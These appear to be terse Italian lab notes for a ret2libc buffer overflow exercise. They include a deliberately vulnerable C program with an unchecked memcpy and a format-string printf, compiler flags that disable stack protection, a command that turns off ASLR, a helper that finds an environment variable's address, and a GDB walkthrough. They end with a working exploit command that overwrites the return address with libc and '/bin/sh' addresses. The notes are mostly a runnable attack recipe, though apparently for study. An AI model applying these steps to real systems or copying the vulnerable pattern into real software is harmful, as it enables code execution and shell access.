uscendo dalla shell si va in segmentation fault perchè come ret c'è AAAA
gcc -m32 -o getenv ./getenv.c
gcc -m32 -fno-stack-protector -z execstack -o vuln ./vuln.c
sudo echo 0 > /proc/sys/kernel/randomize_va_space
vuln.c
#include <stdio.h>
int main(int argc, char *argv[])
{
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
getenv.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char *ptr;
if(argc < 3) {
printf("Usage: %s <environment var> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]); /* Get env var location. */
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* Adjust for program name. */
printf("%s will be at %p\n", argv[1], ptr);
}
export SHELL='/bin/sh'
------------------- GDB --------------------------
gdb ./vuln
b main
r
x/500s $esp
(per trovare l'indirizzo della SHELL)
mv getenv getv (stesso numero di caratteri di vuln)
./vuln $(python -c 'print "A"*268+"\x30\x6c\xe9\xf7"+"AAAA"+"\x3f\xd7\xff\xff"')
./getv SHELL ./vuln
documento pdf